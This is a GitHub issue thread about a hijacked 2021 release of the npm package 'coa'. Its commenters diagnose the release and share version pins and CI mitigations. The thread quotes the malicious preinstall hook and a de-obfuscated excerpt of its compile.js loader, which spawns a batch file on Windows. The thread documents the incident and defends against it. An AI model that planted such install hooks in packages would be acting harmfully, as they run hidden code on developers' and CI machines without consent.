
Last release contains malicious code #99

Closed
RWOverdijk opened this issue Nov 4, 2021 · 172 comments
Comments

@RWOverdijk

RWOverdijk commented Nov 4, 2021

I'm not sure why or what happened but 10 minutes ago there was a release (even though the last change on github was in 2018). Whatever this release did, it broke the svgr cli internet:

Error: Cannot find module '/Users/me/.npm/_npx/27078/lib/node_modules/@svgr/cli/node_modules/coa/compile.js'

The diff:

+ "preinstall": "start /B node compile.js & node compile.js",
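Review bot: a `preinstall` hook that launches a detached background process (`start /B`) and runs a `compile.js` the package never shipped should be rejected on sight; the `Cannot find module .../coa/compile.js` error above is that missing file failing on a non-Windows host. Until ownership is restored, consumers should pin `coa` to 2.0.2 as this thread describes and, where the build tolerates it, install with lifecycle scripts disabled (`npm ci --ignore-scripts`) so that no dependency's install hook can execute in CI.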

Note: The packages were on npm on November 4th, 2021 from 14:12 CET until 15:24 CET.

Note: I'm trying to keep the issue updated but it's going quite fast and there are a lot of useless +1 comments to scroll through 😄

Current status

NPM has removed the compromised versions and, if I understand correctly, blocked new versions from being published temporarily while recovering access to the package.

@veged wrote:

malware version was unpublished https://www.npmjs.com/package/coa (right last version 2.0.2) — but we still need ownership of package back (looks like NPM support doing something right now)

Short-term fix

No fix should be needed as the affected versions have been removed. But I'm leaving what I wrote initially just in case something does go wrong again. For now I'd advise you to pin the version as described below until this has been resolved conclusively.

🤕 Use "coa@2.0.2" specifically. 2.0.3 is the first update that broke things. 🤕

Additionally, as @herrwitzi suggests in the comments, if you use yarn you can add a resolution to your package.json:

"resolutions": { "coa": "2.0.2" },

And as @bugron suggested for other package managers add those to your package.json:
pnpm: https://pnpm.io/package_json#pnpmoverrides

"pnpm": {
    "overrides": {
      "coa": "2.0.2"
    }
},

yarn: https://classic.yarnpkg.com/en/docs/selective-version-resolutions/#toc-how-to-use-it

"resolutions": {
    "coa": "2.0.2"
}

IMPORTANT update

Another update concerning what I wrote here, the versions this applied to have been removed from npm. Leaving it up for the purpose of documenting progress.

The last released version does in fact contain malicious code. It doesn't work, but do not install it. And the dll is up now.

Some antivirus software will apparently pick up the file (thanks @lensflow and @AdamPD)

Original

It looks like an easy fix.

I'm just curious why this was published to begin with as well as the intention. Simply looking at the diff it looks like it is trying to run something in the background.

Is this a failed attempt at publishing malicious code? It certainly looks like it. With millions of installs I think it's a good idea to find out.

@11gorizont11

Same issue +1

@renszee

renszee commented Nov 4, 2021

I'm having the same issue.

@ladyzhenskii

Same with cjs

@yehor-manzhula

Same issue +1

@RWOverdijk RWOverdijk changed the title Last release breaks svgr cli Last release breaks several other packages (broken preinstall) Nov 4, 2021
@socheatsok78

socheatsok78 commented Nov 4, 2021

Also break @vue/cli-service as well

@nicopastor

nicopastor commented Nov 4, 2021

Also breaks @react-scripts

@rzyanhao

rzyanhao commented Nov 4, 2021

+1

@LLLLLamHo

what the fuck!!!

@HeishPi

HeishPi commented Nov 4, 2021

Same +1

@Luuuuuis

Luuuuuis commented Nov 4, 2021

The world is going down!

@yarastqt
Collaborator

yarastqt commented Nov 4, 2021

Hello everyone! We try to resolve this problem :(

@kdescoubes

Same issue here :(

@yarastqt yarastqt self-assigned this Nov 4, 2021

@jaykon-w

jaykon-w commented Nov 4, 2021

same with NX

@marcusthelin

It's breaking our pipelines...What has changed?

@LLLLLamHo

I tried installing coa@2.0.2 in my project and changed coa: "^2.0.2" to coa: "2.0.2" in package.json, which fixed the fucking bug.

@Luuuuuis

Luuuuuis commented Nov 4, 2021

Every developer worldwide from google to facebook is crying right now cause their CI/CD is down

@SolarLiner

start /B is a Windows command that creates a new command-line prompt window. As far as I can see, this is the only change, and it calls a Windows-only command to run a Node script that doesn't even exist.

What?

@maxaon

maxaon commented Nov 4, 2021

This package was compromised. The preinstall is the same as in the issue with ua-parser-js:

https://portswigger.net/daily-swig/popular-npm-package-ua-parser-js-poisoned-with-cryptomining-password-stealing-malware

DO NOT UPDATE IT!

@Tesla0916

Tesla0916 commented Nov 4, 2021

worldwide collapse

@RiQuY

RiQuY commented Nov 4, 2021

Same with cjs

Same problem as you, I guess it's break time.

@AdamPD

AdamPD commented Nov 4, 2021

I'd say compromised. Doesn't NPM have some sort of emergency service for this to rollback releases?

@niksy

niksy commented Nov 5, 2021

since the new MacBooks will not run your Docker images (unless you rebuild them for ARM processors)

Wow. Did not know that. Thanks a lot!

They actually will, but Docker always puts up a disclaimer that it's better if you could use ARM images.

If your images use non-trivial tools it can be tricky to get them working on ARM. You would probably need to build from source for the specific version of the tool, since the majority of tools are only available for x86.

Base images available on Docker Hub usually have ARM version so you’re good to go at least for baseline.

But we digress :D

@DanielRuf

They actually will, but Docker always puts disclaimer that’s it’s better if you could use ARM images.

Nah, you can't use your x86 images as-is. I can safely say that since we have new colleagues at work who tried to run the Java images for a bigger project. And they did not run without additional work. And Windows emulation / VM support is not the best for M1 machines at the moment. Now they all switch to native Windows + WSL (2) / Linux machines.

Base images available on Docker Hub usually have ARM version so you’re good to go at least for baseline.

And that is basically the point, you will have to update your docker-compose files / rebuild the images.

Maybe I should have emphasized it like this: ...your Docker images...
Base images are rarely a problem. And most people do not directly use the pure base images.

@djaho

djaho commented Nov 6, 2021

Thank you all for a quick action here.

@avtokey

avtokey commented Nov 8, 2021

I have the same error on an Angular project. Can anyone tell me the way to fix it? "resolutions" and the other solutions don't work.

@mohe2015

mohe2015 commented Nov 8, 2021

I have the same error on an Angular project. Can anyone tell me the way to fix it? "resolutions" and the other solutions don't work.

Are you using npm or yarn?

@garciawell

AWESOME !!!!! Thanks for all effort to explain and suggest solutions.

@chrisrocks

Does anybody know the exact timeframe of the availability of the malware?
At what time/date were the versions published and when exactly were they removed?
Thanks

@RWOverdijk
Author

Does anybody know the exact timeframe of the availability of the malware? At what time/date were the versions published and when exactly were they removed? Thanks

It's all in this thread. I'll update the description for convenience.

14:12 CET until 15:24 CET based on the comments.

@MichaelGissingNC

This appears to be the relevant part of the de-obfuscated compile.js

var opsys = process["platform"];

if (opsys == "darwin") {
  opsys = "MacOS"
} else {
  if (opsys == "win32" || opsys == "win64") {
    opsys = "Windows";
    const {spawn} = require("child_process"), bat = spawn("cmd.exe", ["/c", "compile.bat"]);
  } else {
    opsys == "linux" && (opsys = "Linux");
  }
}

Can someone please confirm:

  1. This is indeed what was shipped as a payload
  2. Only windows was affected, no code was executed on Linux and MacOS

@Anuj16

Anuj16 commented Nov 9, 2021

@RWOverdijk From the discussion in this entire thread, I think only Windows users were affected and no Linux and Mac users were affected. Is that the correct understanding?

This article says the malicious code checks the OS and then downloads the batch file or Linux bash script accordingly. Do we see some contradiction here?

@RWOverdijk
Author

It did seem that way, yes. I couldn't find any code downloaded (like the dll) or executed (other than the OS check) on anything other than windows.

@vivex

vivex commented Dec 24, 2021

How do I solve this for a global install? I am trying to install expo-cli with yarn global add expo-cli. How can I add a coa override for a global installation?

@DanielRuf

@vivex I'm pretty sure you don't need the override (anymore) since the malicious release doesn't exist anymore.

@vivex

vivex commented Dec 25, 2021

Hi @DanielRuf ,

Thanks for the reply, but I am facing the following error when using expo-cli globally:

  ~ npx expo init fitnest
npx: installed 359 in 104.384s
This command requires Expo CLI.
Do you want to install it globally [Y/n]? Y
Installing the package 'expo-cli'...
npm ERR! code E404
npm ERR! 404 Not Found - GET https://registry.npmjs.org/coa/-/coa-2.1.3.tgz
npm ERR! 404
npm ERR! 404  'coa@^2.0.2' is not in the npm registry.
npm ERR! 404 You should bug the author to publish it (or use the name yourself!)
npm ERR! 404 It was specified as a dependency of 'expo-cli'
npm ERR! 404
npm ERR! 404 Note that you can also install from a
npm ERR! 404 tarball, folder, http url, or git url.

npm ERR! A complete log of this run can be found in:
npm ERR!     /Users/viveksoni/.npm/_logs/2021-12-25T07_40_28_190Z-debug.log
Installing Expo CLI failed. You can install it manually with:
  npm install --global expo-cli
➜  ~

I tried different versions of Node.js, tried clearing the npm/yarn cache, tried both npm and yarn, but I am getting the same error. What should I do to get rid of it?

I will open a ticket in expo-cli also.

Thanks.

@DanielRuf

I will open a ticket in expo-cli also.

That is the recommended solution. Probably their lockfile references the wrong versions.

@luckymore

luckymore commented Mar 18, 2022

@vivex Hi, have you found the way?
For now, I use a local install to resolve it:

"devDependencies": {
  "xx-cli": "^1.0.0",
  "coa": "2.0.2"
}

@DanielRuf

@luckymore see expo/expo-cli#4099 (one of the last referenced issues).


web9app6 added a commit to web9app6/ux that referenced this issue Aug 1, 2023
See: veged/coa#99

This is not an end-user security issue. Simply, we don't want to
allow malicious code to be executed inside our own CI system.
web9app6 added a commit to web9app6/ux that referenced this issue Aug 1, 2023
…erryan)

This PR was merged into the main branch.

Discussion
----------

Preventing malicious version of coa to install in CI

| Q             | A
| ------------- | ---
| Bug fix?      | no
| New feature?  | no
| Tickets       | none
| License       | MIT

See: veged/coa#99

**This is not an end-user security issue**. Simply, we don't want to allow malicious code to be executed inside our own CI system.

Commits
-------

390c710 Preventing malicious version of coa to install in CI
@Wapiti08

Is there any chance to download version 2.0.3 for research purposes? Please share it with me if anyone still holds the package. Thanks a lot

@lirantal

@louislang any chance you folks have it still?

@louislang

Doesn't look like it, unfortunately. I'm sure I can track down a copy if needed though! We've got a rather large corpus of malware at this point if needed; would love to collaborate on some research with anyone that's interested.

symfony-splitter pushed a commit to symfony/ux-turbo that referenced this issue Sep 22, 2023
See: veged/coa#99

This is not an end-user security issue. Simply, we don't want to
allow malicious code to be executed inside our own CI system.